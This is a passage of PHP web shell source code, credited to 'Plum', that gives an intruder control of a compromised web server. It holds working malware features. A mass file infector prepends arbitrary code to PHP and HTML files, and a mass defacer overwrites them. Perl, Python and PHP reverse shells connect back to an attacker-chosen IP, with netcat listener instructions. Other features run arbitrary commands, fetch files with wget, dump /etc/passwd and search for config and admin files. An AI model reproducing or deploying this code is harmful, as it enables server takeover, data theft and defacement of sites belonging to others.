623 } else {
624 error("Failed to find or get sites hosted on same server from: <a href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
625 }
626}
627
628//Search files and directories
629if(isset($_GET['search'])) {
630 echo "<center>
631 <form action='' method='post'>
632 Search for value in file and directory names.<br>
633 Directory to search in: <input type='text' name='search_dir' value='$dir'><br>
634 Value to search for: <input type='text' name='search_val'><br>
635 <input type='submit' name='search' value='Search'>
636 </form>
637 </center>";
638}
639if(isset($_POST['search'])) {
640 $searchdir = $_POST['search_dir'];
641 $searchval = $_POST['search_val'];
642 echo "Search results that contain '$searchval' in file names.<br>";
643 foreach(mass_files($searchdir, false) as $key => $filename) {
644 $basename = pathinfo($filename, PATHINFO_BASENAME);
645 if(preg_match('/'.$searchval.'/', $basename)) {
646 echo "<a href='?edit=$filename'>$filename</a><br>";
647 }
648 }
649 echo "<br>Search results that contain '$searchval' in directory names.<br>";
650 foreach(mass_files($searchdir, true) as $key => $dirname) {
651 $basename = pathinfo($dirname, PATHINFO_BASENAME);
652 if(preg_match('/'.$searchval.'/', $basename)) {
653 echo "<a href='?dir=$dirname'>$dirname</a><br>";
654 }
655 }
656}
657
658//Config finder
659if(isset($_GET['configFinder'])) {
660 echo "Search results that contain 'config' in file names.<br>";
661 foreach(mass_files($rootdir, false) as $key => $filename) {
662 $basename = pathinfo($filename, PATHINFO_BASENAME);
663 if(preg_match('/config/', $basename)) {
664 echo "<a href='?edit=$filename'>$filename</a><br>";
665 }
666 }
667 echo "<br>Search results that contain 'config' in directory names.<br>";
668 foreach(mass_files($rootdir, true) as $key => $filename) {
669 $basename = pathinfo($filename, PATHINFO_BASENAME);
670 if(preg_match('/config/', $basename)) {
671 echo "<a href='?edit=$filename'>$filename</a><br>";
672 }
673 }
674}
675
676//Admin finder
677if(isset($_GET['adminFinder'])) {
678 echo "Search results that contain 'admin' in directory names.<br>";
679 foreach(mass_files($rootdir, true) as $key => $filename) {
680 $basename = pathinfo($filename, PATHINFO_BASENAME);
681 if(preg_match('/admin/', $basename)) {
682 echo "<a href='?edit=$filename'>$filename</a><br>";
683 }
684 }
685 echo "<br>Search results that contain 'admin' in file names.<br>";
686 foreach(mass_files($rootdir, false) as $key => $filename) {
687 $basename = pathinfo($filename, PATHINFO_BASENAME);
688 if(preg_match('/admin/', $basename)) {
689 echo "<a href='?edit=$filename'>$filename</a><br>";
690 }
691 }
692}
693
694//Hash generator
695if(isset($_GET['hashGenerator'])) {
696 echo "<center>
697 <form action='' method='post'>
698 String to hash:<br>
699 <input type='text' name='string'>
700 <input type='submit' name='generate_hashes' value='Hash'>
701 </form>
702 </center>";
703}
704if(isset($_POST['generate_hashes'])) {
705 $string = $_POST['string'];
706 $md5 = md5($string);
707 $md52 = md5(md5($string));
708 $md53 = md5(md5(md5($string)));
709 $sha1 = sha1($string);
710 $sha12 = sha1(sha1($string));
711 $sha13 = sha1(sha1(sha1($string)));
712 $joomlasalt = salt_gen("4");
713 $joomlahash = md5($string.$joomlasalt);
714 $oscommsalt = salt_gen("2");
715 $oscommhash = md5($oscommsalt.$string);
716 $vbsalt = salt_gen("3");
717 $vbhash = md5(md5($string).$vbsalt);
718 $vbsalt2 = salt_gen("30");
719 $vbhash2 = md5(md5($string).$vbsalt2);
720 $mybbsalt = salt_gen("8");
721 $mybbhash = md5(md5($mybbsalt).md5($string));
722 $mybbsalt2 = salt_gen("8");
723 $mybbhash2 = md5(md5($mybbsalt2).$string);
724 $ipbsalt = salt_gen("5");
725 $ipbhash = md5(md5($ipbsalt).md5($string));
726 echo "<center>
727 <textarea cols='120' rows='25' readonly>";
728 echo 'md5($pass): '.$md5."\n";
729 echo 'md5(md5($pass)): '.$md52."\n";
730 echo 'md5(md5(md5($pass))): '.$md53."\n";
731 echo 'sha1($pass): '.$sha1."\n";
732 echo 'sha1(sha1($pass)): '.$sha12."\n";
733 echo 'sha1(sha1(sha1($pass))): '.$sha13."\n";
734 echo 'md5($pass.$salt) (Joomla): '.$joomlahash.':'.$joomlasalt."\n";
735 echo 'md5($salt.$pass) (osCommerce): '.$oscommhash.':'.$oscommsalt."\n";
736 echo 'md5(md5($pass).$salt) (vBulletin < 3.8.5): '.$vbhash.':'.$vbsalt."\n";
737 echo 'md5(md5($pass).$salt) (vBulletin >= 3.8.5): '.$vbhash2.':'.$vbsalt2."\n";
738 echo 'md5(md5($salt).$pass) (MyBB < 1.2): '.$mybbhash2.':'.$mybbsalt2."\n";
739 echo 'md5(md5($salt).md5($pass)) (MyBB 1.2+): '.$mybbhash.':'.$mybbsalt."\n";
740 echo 'md5(md5($salt).md5($pass)) (IPB 2+): '.$ipbhash.':'.$ipbsalt."\n";
741 echo "</textarea>
742 </center>";
743}
744
745//Extract files
746if(isset($_GET['extract'])) {
747 $file = $_GET['extract'];
748 $epath = $_GET['epath'];
749 $type = $_GET['type'];
750 extract_file($file, $epath, $type);
751}
752
753//Infect files
754if(isset($_POST['do_infect'])) {
755 $infdir = rtrim($_POST['infect_dir'], '/');
756 $type = $_POST['infect_type'];
757 $infcode = $_POST['infect_code'];
758 if(is_dir($infdir)) {
759 $success = 0;
760 $failed = 0;
761 foreach(mass_files($infdir, false) as $key => $files) {
762 $exten = pathinfo($files, PATHINFO_EXTENSION);
763 if($type == 'php') {
764 if($exten == 'php') {
765 $content = $infcode;
766 $content .= file_get_contents($files);
767 if(file_put_contents($files, $content)) {
768 echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
769 $success++;
770 } else {
771 echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
772 $failed++;
773 }
774 }
775 } elseif($type == 'html') {
776 if($exten == 'html') {
777 $content = $infcode;
778 $content .= file_get_contents($files);
779 if(file_put_contents($files, $content)) {
780 echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
781 $success++;
782 } else {
783 echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
784 $failed++;
785 }
786 }
787 } elseif($type == 'both') {
788 if($exten == 'html' or $exten == 'php') {
789 $content = $infcode;
790 $content .= file_get_contents($files);
791 if(file_put_contents($files, $content)) {
792 echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
793 $success++;
794 } else {
795 echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
796 $failed++;
797 }
798 }
799 }
800 }
801 echo "A total of $success files were infected!<br>A total of $failed files failed to be infected!";
802 } else {
803 error("$infdir is not a valid directory!");
804 }
805}
806if(isset($_GET['fileInfect'])) {
807 echo "<center>
808 This will append your infect code to the top of every file in the given directory.<br>
809 <form action='' method='post'>
810 Directory to infect: <input type='text' name='infect_dir' value='$rootdir'>
811 File types to infect:
812 <select name='infect_type'>
813 <option value='php'>PHP</option>
814 <option value='html'>HTML</option>
815 <option value='both'>Both</option>
816 </select><br>
817 Code to infect files with:<br>
818 <textarea name='infect_code' cols='110' rows='20'></textarea><br>
819 <input type='submit' name='do_infect' value='Infect'>
820 </form>
821 </center>";
822}
823
824//Deface files
825if(isset($_POST['do_deface'])) {
826 $defdir = rtrim($_POST['deface_dir'], '/');
827 $type = $_POST['deface_type'];
828 $defsource = $_POST['deface_source'];
829 if(is_dir($defdir)) {
830 $success = 0;
831 $failed = 0;
832 foreach(mass_files($defdir, false) as $key => $files) {
833 $exten = pathinfo($files, PATHINFO_EXTENSION);
834 if($type == 'php') {
835 if($exten == 'php') {
836 if($files != __FILE__) {
837 if(file_put_contents($files, $defsource)) {
838 echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
839 $success++;
840 } else {
841 echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
842 $failed++;
843 }
844 }
845 }
846 } elseif($type == 'html') {
847 if($exten == 'html') {
848 if($files != __FILE__) {
849 if(file_put_contents($files, $defsource)) {
850 echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
851 $success++;
852 } else {
853 echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
854 $failed++;
855 }
856 }
857 }
858 } elseif($type == 'both') {
859 if($exten == 'html' or $exten == 'php') {
860 if($files != __FILE__) {
861 if(file_put_contents($files, $defsource)) {
862 echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
863 $success++;
864 } else {
865 echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
866 $failed++;
867 }
868 }
869 }
870 }
871 }
872 echo "A total of $success files were defaced!<br>A total of $failed files failed to be defaced!";
873 } else {
874 error("$defdir is not a valid directory!");
875 }
876}
877if(isset($_GET['fileDeface'])) {
878 echo "<center>
879 This will deface every file in the given directory. This will not deface this shell.<br>
880 <form action='' method='post'>
881 Directory to deface: <input type='text' name='deface_dir' value='$rootdir'>
882 File types to deface:
883 <select name='deface_type'>
884 <option value='php'>PHP</option>
885 <option value='html'>HTML</option>
886 <option value='both'>Both</option>
887 </select><br>
888 Source to deface files with:<br>
889 <textarea name='deface_source' cols='110' rows='20'></textarea><br>
890 <input type='submit' name='do_deface' value='Deface'>
891 </form>
892 </center>";
893}
894
895//Install MSD
896if(isset($_POST['install_msd'])) {
897 if($_POST['version'] == "1") {
898 $msd1link = $links['MSD1']['LINK'];
899 $name = "msdv2.zip";
900 } else {
901 $msd1link = $links['MSD2']['LINK'];
902 $name = "msd1.24.4.zip";
903 }
904 $msd1dir = rtrim($_POST['msd_dir'], '/');
905 if(is_dir($msd1dir)) {
906 $get = file_get_contents($msd1link);
907 if(file_put_contents("$msd1dir/$name", $get)) {
908 extract_file("$msd1dir/$name", $msd1dir, "zip");
909 } else {
910 error('Failed to write zip file to $msd1dir!');
911 }
912 } else {
913 if(mkdir($msd1dir, 0777)) {
914 $get = file_get_contents($msd1link);
915 if(file_put_contents("$msd1dir/$name", $get)) {
916 extract_file("$msd1dir/$name", $msd1dir, "zip");
917 } else {
918 error('Failed to write zip file to $msd1dir!');
919 }
920 } else {
921 error('Failed to make directory $msd1dir!');
922 }
923 }
924}
925if(isset($_GET['installMSD'])) {
926 echo "<center>
927 <form action='' method='post'>
928 <font size='4'>MySQL Dumper v2.1 By Plum</font><br>
929 Directory to install to. If it doesn't exist it will try and create it.<br>
930 <input type='text' name='msd_dir' value='$dir/msd' size='50'>
931 <input type='hidden' name='version' value='1'>
932 <input type='submit' name='install_msd' value='Install'>
933 </form>
934 </center>";
935}
936if(isset($_GET['installMSD2'])) {
937 echo "<center>
938 <form action='' method='post'>
939 <font size='4'>MySQL Dumper v1.24.4 By <a href='http://www.mysqldumper.net/'>http://www.mysqldumper.net/</a></font><br>
940 Directory to install to. If it doesn't exist it will try and create it.<br>
941 <input type='text' name='msd_dir' value='$dir/msd' size='50'>
942 <input type='hidden' name='version' value='2'>
943 <input type='submit' name='install_msd' value='Install'>
944 </form>
945 </center>";
946}
947
948//Back connect
949if(isset($_POST['bcpl_connect'])) {
950 $ip = $_POST['bcpl_ip'];
951 $port = $_POST['bcpl_port'];
952 if(can_exe()) {
953 if(file_exists("/tmp/bc.pl")) {
954 echo "<center>
955 Trying to connect to $ip on port $port<br>
956 The response from 'perl /tmp/bc.pl $ip $port' was:<br>
957 <textarea cols='120' rows='25'>".exe_cmd("perl /tmp/bc.pl $ip $port")."</textarea>
958 </center>";
959 } else {
960 error("/tmp/bc.pl does not exist!");
961 }
962 } else {
963 error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
964 }
965}
966if(isset($_GET['bcPerl'])) {
967 if(can_exe()) {
968 if(is_dir('/tmp')) {
969 if(file_put_contents('/tmp/bc.pl', base64_decode($bcpl))) {
970 success("Successfully wrote /tmp/bc.pl!");
971 echo "<center>
972 <form action='' method='post'>
973 IP: <input type='text' name='bcpl_ip' value='$yourip'>
974 Port: <input type='text' name='bcpl_port' value='2121' size='3'>
975 <input type='submit' name='bcpl_connect' value='Connect'><br>
976 Use: 'nc -l -v -p PORT' Remember your port must be forwarded!
977 </form>
978 </center>";
979 } else {
980 error("Failed to write Perl source to /tmp/bc.pl!");
981 }
982 } else {
983 error('/tmp is not a directory!');
984 }
985 } else {
986 error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
987 }
988}
989
990if(isset($_POST['bcpy_connect'])) {
991 $ip = $_POST['bcpy_ip'];
992 $port = $_POST['bcpy_port'];
993 if(can_exe()) {
994 if(file_exists("/tmp/bc.py")) {
995 echo "<center>
996 Trying to connect to $ip on port $port<br>
997 The response from 'python /tmp/bc.py $ip $port' was:<br>
998 <textarea cols='120' rows='25'>".exe_cmd("python /tmp/bc.py $ip $port")."</textarea>
999 </center>";
1000 } else {
1001 error("/tmp/bc.py does not exist!");
1002 }
1003 } else {
1004 error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
1005 }
1006}
1007if(isset($_GET['bcPython'])) {
1008 if(can_exe()) {
1009 if(is_dir("/tmp")) {
1010 if(file_put_contents('/tmp/bc.py', base64_decode($bcpy))) {
1011 success("Successfully wrote /tmp/by.py");
1012 echo "<center>
1013 <form action='' method='post'>
1014 IP: <input type='text' name='bcpy_ip' value='$yourip'>
1015 Port: <input type='text' name='bcpy_port' value='2121' size='3'>
1016 <input type='submit' name='bcpy_connect' value='Connect'><br>
1017 Use 'nc -l -v -p PORT' Remember your port must be forwarded!
1018 </form>
1019 </center>";
1020 } else {
1021 error("Failed to write Python source to /tmp/by.py");
1022 }
1023 } else {
1024 error("/tmp is not a directory!");
1025 }
1026 } else {
1027 error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
1028 }
1029}
1030
1031if(isset($_POST['bcphp_connect'])) {
1032 $ip = $_POST['bcphp_ip'];
1033 $port = $_POST['bcphp_port'];
1034 echo "<center>Trying to connect!</center>";
1035 $sockopen = fsockopen($ip , $port , $errno, $errstr);
1036 if(!$sockopen) {
1037 error("Failed to open socket!");
1038 } elseif($errno != 0) {
1039 error("$errno: $errstr");
1040 } else {
1041 fputs($sockopen, "\n[+]PHP Back Connection[+]\n\n");
1042 $uname = exe_cmd("uname -a");
1043 $id = exe_cmd("id");
1044 fputs($sockopen, "$uname$id\n");
1045 while(!feof($sockopen)) {
1046 fputs($sockopen, "> ");
1047 $command = fgets($sockopen);
1048 fputs($sockopen , exe_cmd($command));
1049 }
1050 fclose($sockopen);
1051 }
1052}
1053if(isset($_GET['bcPHP'])) {
1054 if(can_exe()) {
1055 echo "<center>
1056 <form action='' method='post'>
1057 IP: <input type='text' name='bcphp_ip' value='$yourip'>
1058 Port: <input type='text' name='bcphp_port' value='2121' size='3'>
1059 <input type='submit' name='bcphp_connect' value='Connect'><br>
1060 Use 'nc -l -v -p PORT' Remember your port must be forwarded!
1061 </form>
1062 </center>";
1063 } else {
1064 error("Can not execute commands! Commands need to be executed for this reverse shell to work!");
1065 }
1066}
1067
1068//System stuff
1069if(isset($_GET['users'])) {
1070 if(file_exists('/etc/passwd')) {
1071 $getfile = file_get_contents('/etc/passwd');
1072 $exline = explode("\n", $getfile);
1073 echo "<table>
1074 <tr>
1075 <th>Username</th>
1076 <th>Password?</th>
1077 <th>UID</th>
1078 <th>GID</th>
1079 <th>UID Info</th>
1080 <th>Home Directory</th>
1081 <th>Command/Shell</th>
1082 </tr>";
1083 foreach($exline as $exl) {
1084 echo "<tr>";
1085 $excol = explode(":", $exl);
1086 foreach($excol as $exc) {
1087 echo "<td>$exc</td>";
1088 }
1089 echo "</tr>";
1090 }
1091 echo "</table>";
1092 } else {
1093 error("/etc/passwd does not exist!");
1094 }
1095}
1096
1097if(isset($_GET['processes'])) {
1098 if(can_exe()) {
1099 $processes = exe_cmd("ps aux");
1100 $stripfirstline = substr($processes, strpos($processes, "\n")+1);
1101 $exline = explode("\n", $stripfirstline);
1102 echo "<div id='hover'>
1103 <table width='100%' border='1'>
1104 <tr>
1105 <th>Kill</th>
1106 <th>USER</th>
1107 <th>PID</th>
1108 <th>%CPU</th>
1109 <th>%MEM</th>
1110 <th>VSZ</th>
1111 <th>RSS</th>
1112 <th>TTY</th>
1113 <th>STAT</th>
1114 <th>START</th>
1115 <th>TIME</th>
1116 <th>COMMAND</th>
1117 </tr>";
1118 foreach($exline as $exl) {
1119 echo "<tr>";
1120 $exsp = array_values(array_filter(explode(" ", $exl), 'strlen'));
1121 if(count($exsp) > 11) {
1122 $slice = array_slice($exsp, 0, 10);
1123 echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
1124 foreach($slice as $s) {
1125 echo "<td>$s</td>";
1126 }
1127 $slice2 = array_slice($exsp, 10);
1128 echo "<td>".implode(" ", $slice2)."</td>";
1129 } else {
1130 echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
1131 foreach($exsp as $e) {
1132 echo "<td>$e</td>";
1133 }
1134 }
1135 echo "</tr>";
1136 }
1137 echo "</table></div>";
1138 } else {
1139 error("Can not execute commands! Must execute 'ps aux' to get processes.");
1140 }
1141}
1142
1143if(isset($_GET['memory'])) {
1144 if(file_exists('/proc/meminfo')) {
1145 $raminfo = file_get_contents('/proc/meminfo');
1146 echo "Ram:<br><pre>$raminfo</pre><br><br>";
1147 } else {
1148 error("/proc/meminfo does not exist!");
1149 }
1150 $hddfree = disk_free_space("/");
1151 $hddtotal = disk_total_space("/");
1152 $hddused = $hddtotal - $hddfree;
1153 $hddpercent = round(($hddused / $hddtotal) * 100);
1154 echo "HDD:<br>Total Space: ".ByteConversion($hddtotal)."<br>Free Space: ".ByteConversion($hddfree)."<br>Used Space: ".ByteConversion($hddused)."<br>Percent Used: ~$hddpercent%";
1155}
1156
1157if(isset($_GET['cpu'])) {
1158 if(file_exists('/proc/cpuinfo')) {
1159 $cpuinfo = file_get_contents('/proc/cpuinfo');
1160 echo "<center>
1161 CPU Information:<br>
1162 <textarea cols='120' rows='20'>$cpuinfo</textarea>
1163 </center>";
1164 } else {
1165 error('/proc/cpuinfo does not exist!');
1166 }
1167}
1168
1169//Execute command
1170if(isset($_POST['exe_cmd'])) {
1171 $command = $_POST['command'];
1172 if(can_exe()) {
1173 echo "<center>
1174 <form action='' method='post'>
1175 <input type='text' name='command' size='75'>
1176 <input type='submit' name='exe_cmd'>
1177 </form>
1178 The response from '$command' was:<br>
1179 <textarea cols='100' rows='20'>".exe_cmd($command)."</textarea>
1180 </center>";
1181 } else {
1182 error("Can not execute commands!");
1183 }
1184}
1185
1186//Create file
1187if(isset($_POST['create_file'])) {
1188 $createpath = $_POST['create_file_path'];
1189 if(!file_exists($createpath)) {
1190 if(fopen($createpath, "w+")) {
1191 redirect("?edit=$createpath");
1192 } else {
1193 error("Failed to create file!");
1194 }
1195 } else {
1196 error("File already exists! You can view it <a href='?edit=$createpath'>here</a>.");
1197 }
1198}
1199//Create directory
1200if(isset($_POST['create_dir'])) {
1201 $dirpath = $_POST['create_dir_path'];
1202 if(!is_dir($dirpath)) {
1203 if(mkdir($dirpath, 0777)) {
1204 redirect("?dir=$dirpath");
1205 } else {
1206 error("Failed to make directory!");
1207 }
1208 } else {
1209 error("This directory already exists! You can view it <a href='?dir=$dirpath'>here</a>.");
1210 }
1211}
1212
1213//wget file
1214if(isset($_POST['do_wget'])) {
1215 $fileurl = $_POST['wget_file'];
1216 if(can_exe()) {
1217 echo "<center>
1218 The response from 'wget $fileurl' was:<br>
1219 <textarea cols='120' rows='20'>".exe_cmd("wget $fileurl")."</textarea>
1220 </center>";
1221 } else {
1222 error("Commands can not be executed!");
1223 }
1224}
1225
1226//Upload file
1227if(isset($_POST['do_upload'])) {
1228 $uploaddir = $_POST['upload_dir'];
1229 $uploadname = $_FILES['upload_file']['name'];
1230 if(!file_exists("$uploaddir/$uploadname")) {
1231 if(move_uploaded_file($_FILES['upload_file']['tmp_name'], "$uploaddir/$uploadname")) {
1232 redirect("?dir=$uploaddir");
1233 } else {
1234 error("Failed to upload file!");
1235 }
1236 } else {
1237 error("File already exists! You can view it <a href='?edit=$uploaddir$uploadname'>here</a>.");
1238 }
1239}
1240
1241//Mass files
1242if(isset($_POST['mass_action'])) {
1243 $action = $_POST['action'];
1244 $checked = $_POST['massbox'];
1245 if($action == 'delete') {
1246 foreach($checked as $c) {
1247 if(is_dir($c)) {
1248 if(rmdir($c)) {
1249 echo "<font color='green'><b>Successfully deleted directory: $c</font><br>";
1250 } else {
1251 echo "<font color='red'><b>Failed to delete directory: $c</font><br>";
1252 }
1253 } else {
1254 if(unlink($c)) {
1255 echo "<font color='green'><b>Successfully deleted file: $c</font><br>";
1256 } else {
1257 echo "<font color='red'><b>Failed to delete file: $c</font><br>";
1258 }
1259 }
1260 }
1261 } elseif($action == 'chmod') {
1262 $chvalue = $_POST['chmod_value'];
1263 foreach($checked as $c) {
1264 if(chmod($c, $chvalue)) {
1265 echo "<font color='red'><b>Successfully chmod'd file: $c to: $chvalue</font><br>";
1266 } else {
1267 echo "<font color='red'><b>Failed to chmod file: $c to: $chvalue</font><br>";
1268 }
1269 }
1270 } else {
1271 error('Invalid action specified!');
1272 }
1273}
1274
1275//Display disabled functions
1276if(isset($_GET['disabledFunctions'])) {
1277 echo "Disabled functions:<br>";
1278 $ex = explode(",", $disabledfunc);
1279 foreach($ex as $e) {
1280 echo "$e<br>";
1281 }
1282}
1283
1284//Kill proccess
1285if(isset($_GET['killProcess'])) {
1286 $id = $_GET['killProcess'];
1287 if(posix_kill($id)) {
1288 success("Successfully killed process: $id");
1289 } else {
1290 error("Failed to kill process: $id");
1291 }
1292}
1293
1294//Check links
1295if(isset($_GET['checkLinks'])) {
1296 echo "<table border='1'>
1297 <tr>
1298 <th>Link</th>
1299 <th>Status</th>
1300 <th>MD5</th>
1301 <th>Description</td>
1302 </tr>";
1303 foreach($links as $key => $ar) {
1304 $link = $ar['LINK'];
1305 $md5 = $ar['MD5'];
1306 $desc = $ar['DESC'];
1307 $headers = @get_headers($link);
1308 echo "<tr>";
1309 echo "<td><a href='$link'>$link</a></td>";
1310 if($headers[0] != "HTTP/1.1 403 FORBIDDEN" or $headers[0] != "HTTP/1.1 404 Not Found") {
1311 echo "<td><font color='green'><b>OK</b></font></td>";
1312 } else {
1313 echo "<td><font color='red'><b>Not Found</b></font></td>";
1314 }
1315 if(md5_file($link) == $md5) {
1316 echo "<td><font color='green'><b>Match</b></font></td>";
1317 } else {
1318 echo "<td><font color='red'><b>No Match</b></font></td>";
1319 }
1320 echo "<td>$desc</td>";
1321 echo "</tr>";
1322 }
1323 echo "</table>";
1324}
1325
1326//Credits
1327if(isset($_GET['credits'])) {
1328 echo "<center>
1329 <font size='6'><b>PHP Shell v$version</font></b><br>
1330 Written By: Plum (@PlumLulz or plumm@jabber.org)<br>
1331 Nav Bar: Bootstrap (<a href='http://getbootstrap.com/'>http://getbootstrap.com/</a>)<br>
1332 MySQL Dumper v2.1: Plum (@PlumLulz or plumm@jabber.org)<br>
1333 MySQL Dumper 1.24.4: <a href='http://mysqldumper.net'>http://mysqldumper.net</a><br>
1334 Perl Reverse Shell: pentestmonkey@pentestmonkey.net<br>
1335 Python Reverse Shell: Xavier Garcia (<a href='http://www.shellguardians.com'>http://www.shellguardians.com</a>)<br>
1336 I think that is about it. Enjoy!
1337 </center>";
1338}
1339
1340//Kill
1341if(isset($_GET['kill'])) {
1342 if(unlink(__FILE__)) {
1343 success("Successfully killed shell!");
1344 } else {
1345 error("Failed to kill shell!");
1346 }
1347}
1348
1349//Let's get the files and directories for the current dir
1350$open = opendir($dir);
1351$files = array();
1352$direcs = array();
1353while ($file = readdir($open)) {
1354 if ($file != "." && $file != "..") {
1355 if (is_dir("$dir/$file")) {
1356 array_push($direcs, $file);
1357 } else {
1358 array_push($files, $file);
1359 }
1360 }
1361}
1362asort($direcs);
1363asort($files);
1364
1365//Let's display those files and dirs
1366//Starting with directories first.
1367echo <<<html
1368<br><br>
1369<table width='100%' border='1'>
1370 <tr>
1371 <th>Current Directory:
1372html;
1373$ex = explode("/", $dir);
1374for ($p = 0; $p < count($ex); $p++) {
1375 @$linkpath.=$ex[$p] . '/';
1376 $linkpath2 = rtrim($linkpath, "/");
1377 echo "<a href='?dir=$linkpath2'>$ex[$p]</a>/";
1378}
1379echo <<<html
1380 </th>
1381 </tr>
1382</table>
1383
1384<form action='' method='post'>
1385 <div id="hover">
1386 <table width='100%' border='1'>
1387 <tr>
1388 <th>File/Dir Name</th>
1389 <th>Permissions</th>
1390 <th>Writeable</th>
1391 <th>Owner/Group</th>
1392 <th>Size</th>
1393 <th>Last Modified</th>
1394 <th>Delete</th>
1395 <th>Rename</th>
1396 <th>Mass</th>
1397 </tr>
1398html;
1399//Display directories
1400foreach($direcs as $dirs) {
1401 $perms = substr(base_convert(fileperms("$dir/$dirs"), 10, 8), 2);
1402 $writeable = is_writeable("$dir/$dirs") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1403 $owner = fileowner("$dir/$dirs");
1404 $group = filegroup("$dir/$dirs");
1405 $size = "Directory";
1406 $lastmod = date("F d Y g:i:s", filemtime("$dir/$dirs"));
1407 echo <<<html
1408 <tr>
1409 <td><a href='?dir=$dir/$dirs'>$dirs</a></td>
1410 <td style="text-align: center;">$perms</td>
1411 <td style="text-align: center;">$writeable</td>
1412 <td style="text-align: center;">$owner/$group</td>
1413 <td>$size</td>
1414 <td>$lastmod</td>
1415 <td><a href='?delD=$dir/$dirs'>Delete</a></td>
1416 <td><a href='?rename=$dirs&rdir=$dir'>Rename</a></td>
1417 <td><input type='checkbox' name='massbox[]' value='$dir/$dirs'></td>
1418 </tr>
1419html;
1420}
1421
1422//Display files now
1423foreach($files as $file) {
1424 $perms = substr(base_convert(fileperms("$dir/$file"), 10, 8), 2);
1425 $writeable = is_writeable("$dir/$file") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1426 $owner = fileowner("$dir/$file");
1427 $group = filegroup("$dir/$file");
1428 $size = ByteConversion(filesize("$dir/$file"));
1429 $lastmod = date("F d Y g:i:s", filemtime("$dir/$file"));
1430 $extension = pathinfo("$dir/$file", PATHINFO_EXTENSION);
1431 echo "<tr>";
1432 if(in_array($extension, $compression)) {
1433 echo "<td><a href='?extract=$dir/$file&epath=$dir&type=$extension'>$file</a></td>";
1434 } else {
1435 echo "<td><a href='?edit=$dir/$file'>$file</a></td>";
1436 }
1437 echo <<<html
1438 <td style="text-align: center;">$perms</td>
1439 <td style="text-align: center;">$writeable</td>
1440 <td style="text-align: center;">$owner/$group</td>
1441 <td>$size</td>
1442 <td>$lastmod</td>
1443 <td><a href='?delF=$dir/$file'>Delete</a></td>
1444 <td><a href='?rename=$file&rdir=$dir'>Rename</a></td>
1445 <td><input type='checkbox' name='massbox[]' value='$dir/$file'></td>
1446 </tr>
1447html;
1448}
1449echo <<<html
1450 </table>
1451 </div>
1452<div style='position:absolute; right:0%;'>
1453 <select name='action'>
1454 <option value='delete'>Delete</option>
1455 <option value='chmod'>chmod</option>
1456 </select>
1457 <input type='text' name='chmod_value' class='text' value='077' size='9'>
1458 <input type='submit' name='mass_action' value='Do Action'>
1459</div>
1460</form>
1461<br>
1462<br>
1463<br>
1464html;
1465
1466if(is_writeable($dir)) {
1467 $writeable = "<font color='green'><b>[ Writeable ]</b></font>";
1468} else {
1469 $writeable = "<font color='red'><b>[ Not Writeable ]</b></font>";
1470}
1471echo "<table width='100%' border='1'>
1472 <tr>
1473 <td>
1474 <center>
1475 <form action='' method='post'>
1476 Create File:<br>
1477 <input type='text' name='create_file_path' size='55' value='$dir/newfile.php'>
1478 <input type='submit' name='create_file' value='Create'><br>
1479 $writeable
1480 </form>
1481 </center>
1482 </td>
1483 <td>
1484 <center>
1485 <form action='' method='post'>
1486 Create Directory:<br>
1487 <input type='text' name='create_dir_path' size='55' value='$dir/newdir'>
1488 <input type='submit' name='create_dir' value='Create'><br>
1489 $writeable
1490 </form>
1491 </center>
1492 </td>
1493 </tr>
1494 <tr>
1495 <td>
1496 <center>
1497 <form action='' method='get'>
1498 Edit File:<br>
1499 <input type='text' name='edit' size='55' value='$dir/index.php'>
1500 <input type='submit' value='Edit'>
1501 </form>
1502 </center>
1503 </td>
1504 <td>
1505 <center>
1506 <form action='' method='get'>
1507 Go To Directory:<br>
1508 <input type='text' name='dir' size='55' value='/tmp'>
1509 <input type='submit' value='Go'>
1510 </form>
1511 </center>
1512 </td>
1513 </tr>
1514 <tr>
1515 <td>
1516 <center>
1517 <form action='' method='post' enctype='multipart/form-data'>
1518 Upload To Directory:<br>
1519 <input type='text' name='upload_dir' size='55' value='$dir'><br>
1520 <input type='file' name='upload_file'>
1521 <input type='submit' name='do_upload' value='Upload'><br>
1522 $writeable
1523 </form>
1524 </center>
1525 </td>
1526 <td>
1527 <center>
1528 <form action='' method='post'>
1529 wget file:<br>
1530 <input type='text' name='wget_file' size='55' value='http://'>
1531 <input type='submit' name='do_wget' value='wget'>
1532 </form>
1533 </center>
1534 </td>
1535 </tr>
1536 <tr>
1537 <td colspan='2'>
1538 <center>
1539 <form action='' method='post'>
1540 Execute Command:<br>
1541 <input type='text' name='command' size='65'>
1542 <input type='submit' name='exe_cmd' value='Execute'>
1543 </form>
1544 </center>
1545 </td>
1546 </tr>
1547 </table>
1548 <br>
1549 <br>";
1550
1551?>